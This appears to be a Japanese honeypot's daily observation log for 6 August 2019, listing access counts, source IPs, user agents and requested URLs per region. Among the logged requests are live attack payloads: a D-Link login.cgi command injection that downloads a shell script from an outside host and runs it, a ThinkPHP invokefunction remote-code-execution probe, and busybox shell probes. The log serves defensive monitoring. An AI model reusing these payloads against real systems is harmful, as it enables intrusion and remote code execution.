ハニーポット(仮) 観測記録 2019/08/06分です。
APでは
D-linkの脆弱性を狙うアクセス
OpenDreamBoxの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Hakai/2.0でのスキャン行為
Jorgeeでのスキャン行為
ZmEuでのスキャン行為
5[.]188[.]210[.]101に関する不正通信
を確認しました。
USでは
ThinkPHPの脆弱性を狙うアクセス
110[.]249[.]212[.]46に関する不正通信
5[.]188[.]210[.]101に関する不正通信
Gh0st\xadのアクセス
を確認しました。
EUでは
phpMyAdminに対するスキャン行為
ZmEuでのスキャン行為
110[.]249[.]212[.]46に関する不正通信
Gh0st\xadのアクセス
を確認しました。
アクセス数推移
AP:総アクセス数:125 (前日比:-363)
US:総アクセス数:20 (前日比:+2)
EU:総アクセス数:43 (前日比:+30)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 103.74.54.107 | India |
1 | 106.13.6.61 | China |
9 | 106.51.37.22 | India |
2 | 109.206.178.16 | Netherlands |
1 | 125.64.94.211 | China |
2 | 134.209.221.113 | United States |
9 | 139.59.145.209 | Germany |
2 | 142.93.150.96 | Canada |
2 | 153.126.166.53 | Japan |
2 | 160.16.127.253 | Japan |
2 | 167.71.69.220 | United States |
1 | 172.104.242.173 | United States |
9 | 187.188.145.38 | Mexico |
9 | 193.253.180.84 | France |
2 | 195.110.58.156 | United Kingdom |
3 | 195.154.86.34 | France |
2 | 206.81.6.222 | United States |
3 | 213.128.88.99 | Turkey |
2 | 213.6.16.226 | Palestine |
9 | 217.210.75.56 | Sweden |
2 | 45.67.219.18 | United States |
2 | 46.101.252.21 | Germany |
9 | 51.154.159.170 | Switzerland |
1 | 5.188.210.101 | Russia |
2 | 5.196.218.182 | France |
1 | 5.254.40.66 | United States |
9 | 61.32.227.146 | South Korea |
4 | 82.193.98.230 | Ukraine |
9 | 84.14.109.227 | France |
2 | 91.121.132.158 | France |
9 | 91.47.163.233 | Germany |
1 | 96.30.129.193 | Canada |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Hakai/2.0 |
1 | Mozilla/5.0 |
3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
113 | Mozilla/5.0 Jorgee |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
3 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
9 | GET | /db/ | HTTP/1.1 |
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://142[.]93[.]64[.]50/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
24 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
9 | GET | /pma/ | HTTP/1.1 |
10 | GET | /PMA/ | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /webadmin/script?command= | busybox|HTTP/1.1 |
9 | HEAD | /dbadmin/ | HTTP/1.1 |
9 | HEAD | /db/ | HTTP/1.1 |
1 | HEAD | /images/ | HTTP/1.1 |
24 | HEAD | /phpmyadmin/ | HTTP/1.1 |
9 | HEAD | /pma/ | HTTP/1.1 |
10 | HEAD | /PMA/ | HTTP/1.1 |
1 | \x16\x03\x01 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 110.249.212.46 | China |
1 | 125.64.94.211 | China |
10 | 170.178.168.90 | United States |
1 | 172.104.242.173 | United States |
1 | 176.196.53.250 | Russia |
1 | 185.209.0.12 | Latvia |
1 | 5.188.210.101 | Russia |
1 | 62.45.102.33 | Netherlands |
1 | 64.121.155.96 | United States |
1 | 66.240.205.34 | United States |
1 | 85.93.20.170 | Poland |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
1 | Go-http-client/1.1 |
2 | Mozilla/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
2 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | Gh0st\xad | ||
1 | HEAD | /images/ | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
2 | \x03 | ||
1 | \x16\x03\x01 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 110.249.212.46 | China |
34 | 142.93.224.235 | Netherlands |
1 | 172.104.242.173 | United States |
1 | 185.209.0.12 | Latvia |
1 | 185.53.88.40 | Estonia |
1 | 66.240.205.34 | United States |
1 | 85.93.20.170 | Poland |
UserAgent一覧
件数 | UserAgent |
---|---|
9 | - |
34 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /admincooptel/phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /admin/phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /admin/scripts/setup.php | HTTP/1.1 |
1 | GET | /alt/sqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /configuracion/phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /db/scripts/setup.php | HTTP/1.1 |
4 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /mysqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /mysql/scripts/setup.php | HTTP/1.1 |
1 | GET | /MySQL/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin-2.8.0.4/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin2/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin.box25/scripts/setup.php | HTTP/1.1 |
1 | GET | /php-my-admin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /_phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pHpMyAdMiN/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php/index.php | HTTP/1.1 |
1 | GET | /phpMyAdmin-www072510/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmy/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmy/scripts/setup.php\ | HTTP/1.1 |
1 | GET | /php/phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /php/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /PMA/scripts/setup.php | HTTP/1.1 |
1 | GET | /pyaniste/mysqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /~riba/pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /scripts/setup.php | HTTP/1.1 |
1 | GET | /sqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /web/phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /websql/scripts/setup.php | HTTP/1.1 |
1 | Gh0st\xad | ||
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | \x03 |